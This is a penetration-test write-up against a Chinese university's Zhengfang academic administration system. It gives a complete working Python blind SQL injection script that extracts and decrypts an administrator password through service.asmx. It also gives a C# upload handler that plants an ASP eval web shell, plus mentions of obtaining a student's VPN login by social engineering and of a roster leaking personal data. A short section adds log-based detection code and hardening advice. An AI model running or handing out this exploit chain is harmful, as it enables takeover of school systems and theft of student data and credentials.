Notes on a Zhengfang system: from injection to getshell to a failed privilege escalation

A project I have been busy with lately; this is just a record of it.

Note: the penetration test was authorized, and key information has been redacted.

0x01 Social engineering

Through social engineering, I obtained the VPN account and password of a student at the school.

0x02 Zhengfang SQL injection

service.asmx is present, so try injection against it:

```python
import requests
import re
import os
def add(a):
    if a=='~':
        a=None
        return a
    a=chr(ord(a)+1)
    if a=='&' or a=='<':
        a=chr(ord(a)+1)
    return a
def zfDecrypt(pwd,key="Encrypt01"):
    print 'beginning to decrypte password...'
    tmp = ""
    for i in range(len(pwd)//len(key)+1):
        tmp = tmp + key
    key = tmp[0:len(pwd)]

    pwdLength = len(pwd)

    if (pwdLength % 2 ==0):
        pwd_1 = list(pwd[0:pwdLength//2])
        pwd_2 = list(pwd[pwdLength//2:pwdLength])
        pwd_1.reverse()
        pwd_2.reverse()
        pwd = ''.join(pwd_1)+''.join(pwd_2)

    array_p = []
    array_k = []

    for i in range(pwdLength):

        array_p.append(pwd[i:i+1])
        array_k.append(key[i:i+1])
        a = ord(array_p[i])^ord(array_k[i])

        if((a>=32)and(a<=126)):
            array_p[i] = chr(a)
    pwd = ''.join(array_p)
    print 'decryption finished'
    return pwd
def getSession(url):
    s=requests.session()
    r=s.get(url)
    return url+r.request.path_url
def addasmx(url):
    pos=url.rfind('/')
    return url[:pos]+'/service.asmx'
def handle_url(url):
    if url[-1]=='/':
        url=url[:-1]
    s=requests.session()
    r=s.get(url)
    if r.request.path_url!='/':
        pos=r.request.path_url.rfind('/')
        session=r.request.path_url[:pos]
    else:
        session=r.request.path_url
    url=url+session+'/service.asmx'
    r=requests.get(url)
    if r.status_code==200 and 'ERROR' not in r.content:
        return url
    else: 
        return None
def get_headers_body(url,xn,xh):
    regx='<pre>([\s\S]+?)</pre>'
    r=requests.get(url+'?op=zfcwjk1')
    ret=re.findall(regx,r.content)
    pos=ret[0].find('\r\n\r\n')
    headers=ret[0][:pos]
    body=ret[0][pos+4:]
    headers=headers.split('\r\n')[1:]
    headers={i.split(': ')[0]:''.join(i.split(': ')[1:]) for i in headers if 'Content-Length' not in i}
    headers['User-Agent']='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'
    body=body.replace('&lt;','<')\
             .replace('&gt;','>')\
             .replace('<font class=value>','')\
             .replace('</font>','')
    body=body.replace('>string<','>'+xn+'<',1)\
             .replace('>string<','>'+xh+'\' and (SELECT SUBSTR(TO_CHAR(KL),%s,1) from yhb where yhm=\'jwc01\')=\'%s'+'<',1)\
             .replace('>string<','>'+'\' or \'1\'=\'1'+'<')
    return headers,body

def sqlinject(url,headers,body):
    reg='<zfcwjk1Result xsi:type="xsd:int">(\d)</zfcwjk1Result>'
    password=''
    r=requests.get(url)
    print 'beginning to do sql injection....'
    for i in range(1,20):
        c=' '
        org=len(password)
        while c!=None:
            print 'trying '+str(i)+'th'+':'+c
            data=body%(str(i),c)
            r=requests.post(url,headers=headers,data=data)
            ret=re.findall(reg,r.content)
            if ret==[]:
                continue
            if ret[0]=='3':
                print 'corrent char found:'+c
                password=password+c
                break
            elif ret[0]=='2':
                c=add(c)
            else:
                print ret
                break
        if org==len(password):
            print 'sql injection finished ,encrypted password:'+password+'\n'
            break
    return password


url=raw_input('please input target url:')
xh=raw_input('please input xuehao:')
xn=raw_input('please input xuenian:')
url=handle_url(url)
if url==None:
    print 'cannot access target url'
    print '/service.asmx might be removed or the url is wrong'
    os.system('PAUSE')
    os._exit(0)
headers,body=get_headers_body(url,xn,xh)
encrypt=sqlinject(url,headers,body)
text=zfDecrypt(encrypt)
print 'account:jwc01\npassword:'+text+'\n\n\n'
```

Note that a valid student number (xuehao) has to be supplied here.

With the account and password in hand, you can log in to the Zhengfang educational administration system.

0x03 Information disclosure

The system has a class roll-call roster, which leaks personal information.

0x04 Getshell

Uploads are possible in the teaching announcements section: .ashx files are accepted, but uploading a shell directly produces an error, so use the following small handler to generate a one-liner:

```csharp
<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;

public class Handler : IHttpHandler {
    public void ProcessRequest(HttpContext context) {
        context.Response.ContentType = "text/plain";
        StreamWriter file1 = File.CreateText(context.Server.MapPath("a.asp"));
        file1.Write("<%eval request(\"a\")%>");
        file1.Flush();
        file1.Close();
    }
    public bool IsReusable {
        get { return false; }
    }
}
```

Visit it once to generate the one-liner (/wbwj/xxx.ashx), then connect with AntSword.

Interestingly, the target ran several identical copies of the system, so the same steps worked on all of them.
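From the defender's side, the two steps above leave distinct traces in the web server log: the blind injection sends one POST to service.asmx per candidate character, and the getshell step ends with an uploaded handler being requested under /wbwj/. The following detection logic is an added example, not code from the post; it runs over constructed IIS W3C-style log lines, and the field layout, the burst threshold and window, and the upload-directory pattern are assumptions to adjust to the real deployment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed IIS W3C-style sample (date time method uri-stem query client-ip status); not from the post.
SAMPLE_LOG = """\
2019-03-10 08:00:00 GET /jwc/default2.aspx - 10.0.0.5 200
2019-03-10 08:00:01 POST /jwc/service.asmx - 10.0.0.5 200
2019-03-10 08:00:02 POST /jwc/service.asmx - 10.0.0.5 200
2019-03-10 08:00:02 POST /jwc/service.asmx - 10.0.0.5 200
2019-03-10 08:00:03 POST /jwc/service.asmx - 10.0.0.5 200
2019-03-10 08:00:04 POST /jwc/service.asmx - 10.0.0.5 200
2019-03-10 08:00:05 POST /jwc/service.asmx - 10.0.0.5 200
2019-03-10 08:01:10 POST /jwc/service.asmx - 10.0.0.7 200
2019-03-10 08:02:30 GET /jwc/wbwj/xxx.ashx - 10.0.0.5 200
2019-03-10 08:02:31 POST /jwc/wbwj/a.asp a=1 10.0.0.5 200
"""

LINE_RE = re.compile(r'^(\S+ \S+) (\S+) (\S+) \S+ (\S+) \d+$')
BURST_THRESHOLD = 5                    # POSTs to service.asmx from one client IP ...
BURST_WINDOW = timedelta(seconds=60)   # ... within this window = blind-injection pattern (assumed)
UPLOAD_DIR_RE = re.compile(r'/wbwj/[^/]+\.(ashx|asp|aspx)$', re.I)  # executable handler in upload dir

def parse(log_text):
    """Yield (timestamp, method, path, client_ip) for each well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), '%Y-%m-%d %H:%M:%S')
            yield ts, m.group(2), m.group(3).lower(), m.group(4)

def detect(log_text):
    """Return findings as (rule, client_ip, detail) tuples."""
    findings, asmx_posts = [], defaultdict(list)
    for ts, method, path, ip in parse(log_text):
        if method == 'POST' and path.endswith('/service.asmx'):
            asmx_posts[ip].append(ts)
        if UPLOAD_DIR_RE.search(path):
            findings.append(('handler_in_upload_dir', ip, path))
    for ip, times in asmx_posts.items():
        times.sort()
        best = start = 0
        for end in range(len(times)):        # sliding window over sorted timestamps
            while times[end] - times[start] > BURST_WINDOW:
                start += 1
            best = max(best, end - start + 1)
        if best >= BURST_THRESHOLD:
            findings.append(('service_asmx_burst', ip, best))
    return findings
```

A cheaper control than detection is to make the upload directory non-executable in IIS (no handler mappings for .ashx/.asp/.aspx under it), which the second rule then verifies rather than merely flags.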

0x05 Failed privilege escalation

Privilege escalation was puzzling: only the web root was writable, files above a certain size apparently could not be written at all, and commands could not be executed. The larger shell I uploaded redirected straight to the error page. I considered whether a WAF was in place, but simple probing turned up nothing.

It has to be set aside for now; I still have not worked out the cause. In testing, only the small handler shown above that generates the one-liner worked; everything else redirected to the error page.
